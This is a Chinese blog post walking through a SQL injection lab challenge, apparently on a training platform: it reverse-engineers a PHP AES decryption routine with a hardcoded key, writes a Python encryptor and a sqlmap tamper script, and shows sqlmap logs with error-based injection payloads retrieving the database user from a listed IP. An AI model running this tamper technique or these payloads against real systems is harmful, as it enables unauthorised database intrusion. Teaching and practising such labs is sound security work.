首页 综合资源 WEB安全 正文

实战经验分享丨记一次SQL注入题目的解题思路

WEB安全
2020-05-13 0 3,665

这是一个比较基础的题,在实战中经常会遇到。比如说前端利用JavaScript公钥加密并传输给后端,后端通过私钥进行解密执行,这样做的好处就在于可以有效的避免了中间人攻击,跟SSL原理差不多,只是SSL在传输层,而这种加密是在应用层。

简单介绍了一下分享这篇文章的原因,那么就开始进入主题吧~

源码分析

先来看下后端的PHP源码:

function decode($data){
    $td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,'');
    mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','2018201920202021');
    $data = mdecrypt_generic($td,base64_decode(base64_decode($data)));
    mcrypt_generic_deinit($td);
    mcrypt_module_close($td);
    if(substr(trim($data),-6)!=='_mozhe'){
        echo '<script>window.location.href="/index.php" rel="external nofollow"  rel="external nofollow"  rel="external nofollow" ;</script>';
    }else{
        return substr(trim($data),0,strlen(trim($data))-6);
    }
}

这是一个解密函数,我们来逐条分析。

$td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,'');

首先定义了一个变量,这个变量调用了打开PHP crypto库中的加密函数。定义了加密方法为AES加密,加密模式为CBC,数据块为128位。

mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','2018201920202021');

初始化加密缓冲区,描述为变量td。

加密密钥为:ydhaqPQnexoaDuW3

$data = mdecrypt_generic($td,base64_decode(base64_decode($data)));

进行两次base64的解密后,使用上述方法进行将加密的密文还原成明文。

mcrypt_generic_deinit($td);
mcrypt_module_close($td);

结束加密,关闭加密模块。

    if(substr(trim($data),-6)!=='_mozhe'){
        echo '<script>window.location.href="/index.php" rel="external nofollow"  rel="external nofollow"  rel="external nofollow" ;</script>';
    }else{
        return substr(trim($data),0,strlen(trim($data))-6);
    }

如果明文的后6位不是_mozhe,那么解密函数将不返回数据,并且跳转到index.php上。

如果明文后6位是_mozhe,那么将返回加密值,并且去掉后面的_mozhe。

使用python构造加密函数

既然都已经知道了解密函数的写法,那就反推写出加密函数就好了。

#!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
home.php?mod=space&uid=210785    :   cryptomozhe.py   
@Author  :   Angel
home.php?mod=space&uid=163876    :   W3bSafe

'''

from base64 import b64decode,b64encode
from Crypto.Cipher import  AES

def encrypt(text):
    cryptor = AES.new('ydhaqPQnexoaDuW3', AES.MODE_CBC, IV="2018201920202021")
    length = 16
    count = len(text)
    add=count % length
    if add:
        text = text + ('' * (length-add))
    ciphertext = cryptor.encrypt(text)
    return b64encode(b64encode(ciphertext))

def decrypt(text):
    cryptor = AES.new('ydhaqPQnexoaDuW3', AES.MODE_CBC, IV="2018201920202021")
    length = 16
    count = len(text)
    add=count % length
    if add:
        text = text + ('' * (length-add))
    ciphertext = cryptor.decrypt(b64decode(b64decode(text)))
    return ciphertext
if __name__ == '__main__':
    print("encrypt:"+encrypt(str(raw_input("Please input text with encrypt:"))))
    print("decrypt:"+decrypt(str(raw_input("Please input text with decrypt:"))))

来尝试下写的加解密脚本是否正确与通用,首先我们先用这个Python脚本对明文:This is a test value_mozhe进行加密,得到加密后的结果为密文:

ZFR1dE9MS3NNM1p4c3hxVng2YmlBVzVEYWFkVE5nNGdseW04RFh6MWF5OD0=

实战经验分享丨记一次SQL注入题目的解题思路

Please input text with encrypt:This is a test value_mozhe
encrypt:ZFR1dE9MS3NNM1p4c3hxVng2YmlBVzVEYWFkVE5nNGdseW04RFh6MWF5OD0=
Please input text with decrypt:ZFR1dE9MS3NNM1p4c3hxVng2YmlBVzVEYWFkVE5nNGdseW04RFh6MWF5OD0=
decrypt:This is a test value_mozhe      

然后在写一个PHP文件,使用题目中所给的php函数对刚刚加密过的密文进行解密。

<?phpfunction decode($data){    $td = mcrypt_module_open(MCRYPT_RIJNDAEL_128,'',MCRYPT_MODE_CBC,'');
    mcrypt_generic_init($td,'ydhaqPQnexoaDuW3','2018201920202021');
    $data = mdecrypt_generic($td,base64_decode(base64_decode($data)));
    mcrypt_generic_deinit($td);
    mcrypt_module_close($td);
    if(substr(trim($data),-6)!=='_mozhe'){
        echo '<script>window.location.href="/index.php" rel="external nofollow"  rel="external nofollow"  rel="external nofollow" ;</script>';
    }else{
        return substr(trim($data),0,strlen(trim($data))-6);
    }}$val="ZFR1dE9MS3NNM1p4c3hxVng2YmlBVzVEYWFkVE5nNGdseW04RFh6MWF5OD0=";echo decode($val);

执行结果:

实战经验分享丨记一次SQL注入题目的解题思路

解密成功。

构造sqlmap tamper脚本,进行注入测试

已经验证了python加密函数的可行性,那么直接把构造好的加密函数写成sqlmap,能运行的tamper脚本就ok了。别忘了要在明文后面加上_mozhe:

#!/usr/bin/env python
# -*- encoding: utf-8 -*-
'''
@File    :   mozhe.py   
@Author  :   Angel
@Team    :   W3bSafe

'''

import base64
from Crypto.Cipher import  AES
from lib.core.enums import PRIORITY
from lib.core.settings import UNICODE_ENCODING
__priority__ = PRIORITY.LOW

def encrypt(text):
    cryptor = AES.new('ydhaqPQnexoaDuW3', AES.MODE_CBC, IV="2018201920202021")
    length = 16
    count = len(text)
    add=count % length
    if add:
        text = text + ('' * (length-add))
    ciphertext = cryptor.encrypt(text)
    return base64.b64encode(ciphertext)

def dependencies():
    pass
def tamper(payload, **kwargs):
    payload=encrypt((payload+"_mozhe").encode('utf-8'))
    payload=base64.b64encode(payload)
    return payload

让sqlmap加载tamper进行注入测试:

PS C:WINDOWSsystem32> sqlmap -u "http://219.153.49.228:40570/news/list.php?id=" --tamper=mozhe --dbms=mysql --technique=E
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.2.5.10#dev}
|_ -| . [']     | .'| . |
|___|_  [']_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:43:43

[11:43:43] [INFO] loading tamper module 'mozhe'
[11:43:44] [WARNING] provided value for parameter 'id' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[11:43:44] [INFO] testing connection to the target URL
[11:43:44] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[11:43:44] [WARNING] heuristic (basic) test shows that GET parameter 'id' might not be injectable
[11:43:44] [INFO] testing for SQL injection on GET parameter 'id'
[11:43:44] [INFO] testing 'MySQL >= 5.0 与-AND 基于报错注入 - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[11:43:44] [INFO] testing 'MySQL >= 5.0 基于报错注入 - Parameter replace (FLOOR)'
[11:43:45] [INFO] GET parameter 'id' is 'MySQL >= 5.0 基于报错注入 - Parameter replace (FLOOR)' injectable
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n]
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 9 HTTP(s) requests:
---
Parameter: id (GET)
    Type: error-based
    Title: MySQL >= 5.0 基于报错注入 - Parameter replace (FLOOR)
    Payload: id=(SELECT 1957 FROM(SELECT COUNT(*),CONCAT(0x7171766b71,(SELECT (ELT(1957=1957,1))),0x71786a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---
[11:43:47] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[11:43:47] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx
back-end DBMS: MySQL >= 5.0
[11:43:47] [INFO] fetched data logged to text files under 'C:Usersadmin.sqlmapoutput219.153.49.228'

[*] shutting down at 11:43:47

实战经验分享丨记一次SQL注入题目的解题思路

查询注入语句:

PS C:WINDOWSsystem32> sqlmap -u "http://219.153.49.228:40570/news/list.php?id=" --tamper=mozhe --dbms=mysql --technique=E -v 3 --current-user
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.2.5.10#dev}
|_ -| . ["]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:46:20
[11:46:20] [DEBUG] cleaning up configuration parameters
[11:46:20] [INFO] loading tamper module 'mozhe'
[11:46:20] [DEBUG] setting the HTTP timeout
[11:46:20] [DEBUG] creating HTTP requests opener object
[11:46:20] [DEBUG] forcing back-end DBMS to user defined value
[11:46:21] [WARNING] provided value for parameter 'id' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[11:46:21] [INFO] testing connection to the target URL
[11:46:21] [DEBUG] declared web page charset 'utf-8'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: error-based
    Title: MySQL >= 5.0 基于报错注入 - Parameter replace (FLOOR)
    Payload: id=(SELECT 1957 FROM(SELECT COUNT(*),CONCAT(0x7171766b71,(SELECT (ELT(1957=1957,1))),0x71786a7871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
    Vector: (SELECT [RANDNUM] FROM(SELECT COUNT(*),CONCAT('[DELIMITER_START]',([QUERY]),'[DELIMITER_STOP]',FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)
---[11:46:21] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[11:46:21] [INFO] testing MySQL
[11:46:21] [DEBUG] searching for error chunk length...
[11:46:21] [PAYLOAD] RFA2U25sUmZkKzFxMWdtL1p2V2UwS0ZLWWVvdGx3cHJSTjRGZm56aDRteHRFdDZWbCtvRzdwK1gzTVV1cnFEaElYVStxcEFoWlg3ZzlkRldQaUFkL0J5Zzc4ZW1XT3pPS09BRU9kM3RodUFWNHdHNUFmQlNsMmh1cVZaQkNLQzRmVlhMUVV3SmVxUUw3RWNpVGdyNGNFbm8rTnZZNnFrK1BVWm1heloyUWNOQjBHUEpTTzIzNmkxVU5hcSs2MkpxUXRIbjNFK2l1dG5lZU8raWhlaUhLTHBRMVdNS3k2RWxaMlZWbnZHaEU4MD0=
[11:46:21] [PAYLOAD] eWhEcGExNjE4RVlaQWxtY0NHc0paRTNKZ3FkQmFYZFBRa3dqRVQ2Z255c2ZqdGtuZHJ3UUV2Z0hxM2ZBVUszOU5wRCtRd3dSamxMQjNNdi9IaG5OV1d0cW5lMERWeTloY1VOTDJ6T2RmT3ZURnk1L29Ici81MmJVR3E2eXFvL0VxUWY4dzM0SGp2WHBidFF1amJHdUJNcGx1djBqbEJQQmljNUpna0RXV1JjVCtYVWhraWRGSDNEN0g5a2Robk9uc0MxUTl1djFuU1c3b3ZER0lVVE1XTWlFdEhYNFhzQWl6dzdvYnZQMWozdz0=
[11:46:21] [PAYLOAD] d3FlMjAyVFRiZVRPaEx1RWVGMW9kajRzUFRVQVkzMmtFMk4vZ0dCOHQranVkZ2o5dkFubnBTY0NWTG5oUnpXUk4wNWN6YXNRQjRWMVBzaFk4ZTBTV3pXMm9mWFRLT0FnNHVFWE1IVjdMNTFhNEs0a2Q4RmNCcmxUd2ZMNjVVOWlpU1llcW9uM1VaTk4wYzN1VWR4aFJvQUpBVG85VFVnd3JXSlE4UHk2UEwzbGMwekhNbFRCVlFpN1RtUU5MN1BDeVBnRUQwQkd5UVJIcGpjS1N0RG5CUWk3N0VyOEI2UWFhRElFSXR2cHFzOD0=
[11:46:21] [PAYLOAD] RDBtcGNRSlpGczgwc2dlMEVoV3A0Y3NJeEJMeEZsU3R2cDFwdGlvUDhDK3ZKeTZjTmN0Y21rSEJRWUZjckU3MWs3SWloWFZYeGR4a29hOUlhSlZJdS9kUmxlWnAxcm1DdGYxeUlEendlSGNKVkZ0WVdMaERob0QvTFdqUFViRDgxeitOVUdHcTdpdWdsRDYvUHMza3dNVU0xRUFDZXZkd1EvelR0cDRVWThEV2pqS05CVEdibDFzWXUwMlNwbzdyWitHK09CVkNlY3hIT3ljYlA0WXRiZ1gzcXBQUFNqbHVEcXF5VHhWUllRTT0=
[11:46:21] [PAYLOAD] RGpHTFQ3b21KMytJL2dMWWs5aTlnWklRTG1rQkYwKzRDYjc5TGxOSnBtVlVxZjRuZ1pBcGVFUk1DS05QNFNIbUVaQlIyZTc4WVJ3djVweHJIMi96K3FkcWs5SkZ6V1B5dWZUSHM1R1I2SCtCYkprNHI5elA0TStVdXJ6RGN0c3NHVytFaERGMCsvcWVmWjNwcncrZXk1VnNtN1hQRWhaOUZUeGxNK3JkeGZsUUtSK2RwR3J1Wm9tOVBDTDFnZncwUkhGa08zWEhmZHg3eHZrTHYxd2FycEtYeVlxMHhxcUo1ZVB2Ym1nbWw5YXFFY3VrNW80SlN6dFBRbU5FNFZRV1FKOWZlcVZpQ21jVUpFcUNFd3BINVE9PQ==
[11:46:21] [DEBUG] performed 5 queries in 0.35 seconds
[11:46:21] [INFO] confirming MySQL
[11:46:21] [PAYLOAD] OTF0QkkwZDFQVm9od003UGR6dUxGS3hrcUlXT3RJSTExUlkrRmpwcjV5cWZ3MTNpc0dia3NUQU11UnR**c4b1RBREhRbHlPL1h6UUJDY01mYmRoQktHcXY0YWdIZVFaZ08va0NNTzdtcms5bGJNQ2VoUUNYeC9weFE5dEZvdzdIdmJuUDJXTzNqdHdNc0VjcnV6ZWw0L3NMRWx5dXdZMzNYUlluUndGMEtLYW9GZ0hvT2FjOWVsdFVWdGdTZEVnQUZ3S1AzRDBYUEdwUUV2UUx1c2RFa041NTF3UERDVlJPcHQzRzdXMEtOSlA0dEJiRXpGeE1zTlUwTmpXTmFCdVNRdG1YaE5WelVldmlxL1VsY1d4bHc9PQ==
[11:46:21] [DEBUG] performed 1 queries in 0.07 seconds
[11:46:21] [PAYLOAD] Q0dLbmNOU1FkMFgybFQ0d1ozS3RNVmtlaTVPdVdrUzg2VzQwRFNXM2ZuYlpMaURTZmd2ZC9NV1U0b2tsT1FxT3FmekJGSjdWR0JiNG5HS3ViMktnNmRTU0xzZit6RkJUcjkvVjF5RlhObzdXdzBjSkpJYW5KaWN0ZU5rU25FcDlKV1poMFRDQzN0bEx0bzJteTBEQVhNbkR1eEJYWjNlOWk1Wkp2OGZ6T3RYS2M1OGJCS2htamQxajdXWmIyZ3V0a0FncFRVMFZCWm1aVVZ4QnhXOEJRTUtWZC9Fd0lmaUdNSlFTNHNrSUV5L1Uxb3hoWVdDcGNFcXpvVXRhUHcrWTlPbXFTb0t1RVBsQXF3bFVCakYzdVljNFRYcTg1Y3hsRjFFcy8wbEY4TTA9
[11:46:21] [DEBUG] performed 1 queries in 0.06 seconds
[11:46:21] [PAYLOAD] ank5ZzZJb3ZNOWFvR2JhQWQrRG9OUmY1MnlIczZMalZiY0IweS9leUp5WitncTlubU5ML0cvT0RmTTV2QmpiRWhiSktMazA0UkNkSEU3ZkJCTmhmNGlrQ0JtMVh2c0xFSGg4STcrTzVObWRpYlNXTUtVY0RpVDcrT3g5czdaTzNmY1NzTnNrSnJ6VmppZ2lNUWI4QVBIajlDVktRdG1yb0ZBcGpXa3N2ejNZbTE1UUZHdnBZSC91U09IM1hCeHg2VlV6Ni9mWHlEZlZ3WDhnSjI4dDJtc3l4SXJlRGVEVjhkZEJKZjg1dWtyVDRZcjFwbWlhRVJPcHJpbThyblFNeHNHKytkT2t1c2tLb2VpdHdSMjJLc09RQlpqam5MbUhaUUZ5Vzc0dkk2SUE9
[11:46:21] [DEBUG] performed 1 queries in 0.06 seconds
[11:46:21] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Nginx
back-end DBMS: MySQL >= 5.0.0
[11:46:21] [INFO] fetching current user
[11:46:21] [PAYLOAD] dGV3cy9FUklKc3lJei9iV1lzVzhFck5DaDJzY1UvQVV3bXQ4NERwOFRkMi9ncGExU0JLRnNYSitDQ3lVVlZUZmxUcFFDUFRzckhJS2tLVVRDbHlUZjZSenVEWW05aytrN3BYdEwxT3g2aXJLc1BjWXRzZThSa2FiN0FhVkF6Q0RHek5tSFNncjR6RnJ5TjFKRkxZMi9YMmlMV0Zrc3RLbTNCbDFmUzZJTEhPM2l1dGhrRkpDOTh5S1c3S1dGV0E3QTNNaWY4SFNCdHJmS0FpZmQ4ajhBT1d5RjFtaVR5TnBjOGx5WGVxN09kVHJlUFRURTZNL2JCeUNRSnVQa20xWkxZRW9FZytiRzRsZ1lsdzRKa1hPWlE9PQ==
[11:46:21] [INFO] retrieved: root@localhost
[11:46:21] [DEBUG] performed 1 queries in 0.06 seconds
current user:    'root@localhost'
[11:46:21] [INFO] fetched data logged to text files under 'C:Usersadmin.sqlmapoutput219.153.49.228'
[*] shutting down at 11:46:21
PS C:WINDOWSsystem32>

实战经验分享丨记一次SQL注入题目的解题思路

对sqlmap的payload进行测试。

实战经验分享丨记一次SQL注入题目的解题思路

完成。

今天的文章分享,小伙伴们看懂了吗?

收藏 (0) 打赏

感谢您的支持,我会继续努力的!

打开微信扫一扫,即可进行扫码打赏哦,分享从这里开始,精彩与您同在
点赞 (0)

注:在使用本系统时,使用方必须在国家相关法律法规范围内并经过国家相关部门的授权许可,禁止用于一切非法行为。使用用途仅限于测试、实验、研究为目的,禁止用于一切商业运营,本团队不承担使用者在使用过程中的任何违法行为负责。

83源码 WEB安全 实战经验分享丨记一次SQL注入题目的解题思路 https://www.83ym.com/60.html

认准唯一TG:@ym830

上一篇: 萌新也能看懂的ThinkPHP3.2.3漏洞分析
下一篇: 【组件攻击链】ThinkCMF 高危漏洞分析与利用
常见问题

VIP会员是否无限次下载资源?

  • 站内所有资源,针对不同等级VIP会员可直接下载,特殊资源商品会注明是否免费,指会员所享有根据选择购买的会员选项所享有的特殊服务,具体以本站公布的服务内容为准。
查看详情

正规的网络棋牌运营商需要具备哪些资质?

  • 按照我国的法律规定,运营网络棋牌首先需要成立一个注册正规备案的公司,然后申请网站备案、文网文、ICP等等,这些证件缺一不可。 一.注册公司 在当地工商进行注册,公司名称以“XX科技有限公司”为名,如:富裕棋牌经营范围填写“计算机软硬件、网络设备的设计开发与购销”。 二.域名及网站备案 在国内从事网站经营活动就必须经过相关部门的备案,因此棋牌运营商在购买了域名后,就要到当地网监局办理网站备案,或者请服务器提供商代为备案。 三.申请文网文 文网文全称为网络文化经营许可证,是从事经营性互联网文化活动所必需的资质。一般是需要到当地省一级(省、直辖市、自治区)的文化行政部门提出申请,并经由当地的文化行政部门合法批准。次资质要求申请公司注册资金必需达到1000万,并提供游戏版权证明文件。 四.申请ICP ICP又称为增值电信业务许可证,所有网络游戏运营商均需要办理ICP许可证,此证件要求公司注册资金1000万,需到当地市级通讯管理局办理。 五.申请文网游——游戏备案 根据《网络游戏管理暂行办法》(文化部第49号)的规定,国产网络游戏在上网运营之日起30日内应当按规定向国务院文化行政部门履行备案手续。 以上就是网络棋牌游戏正规运营所必需的资质证明。一般作为正规有实力的棋牌游戏开发公司,不光要具备所有的正规资质,而且会对投资者、代理商等合作伙伴给予相关指导和协助,与合作伙伴携手共赢!
查看详情

相关文章

猜你喜欢
官方客服团队

为您解决烦忧 - 24小时在线 专业服务

联系官方团队 在线提交工单
反诈公益广告 到期时间:2030/04/30
热门推荐
热门标签
首页 VIP 菜单 客服 我的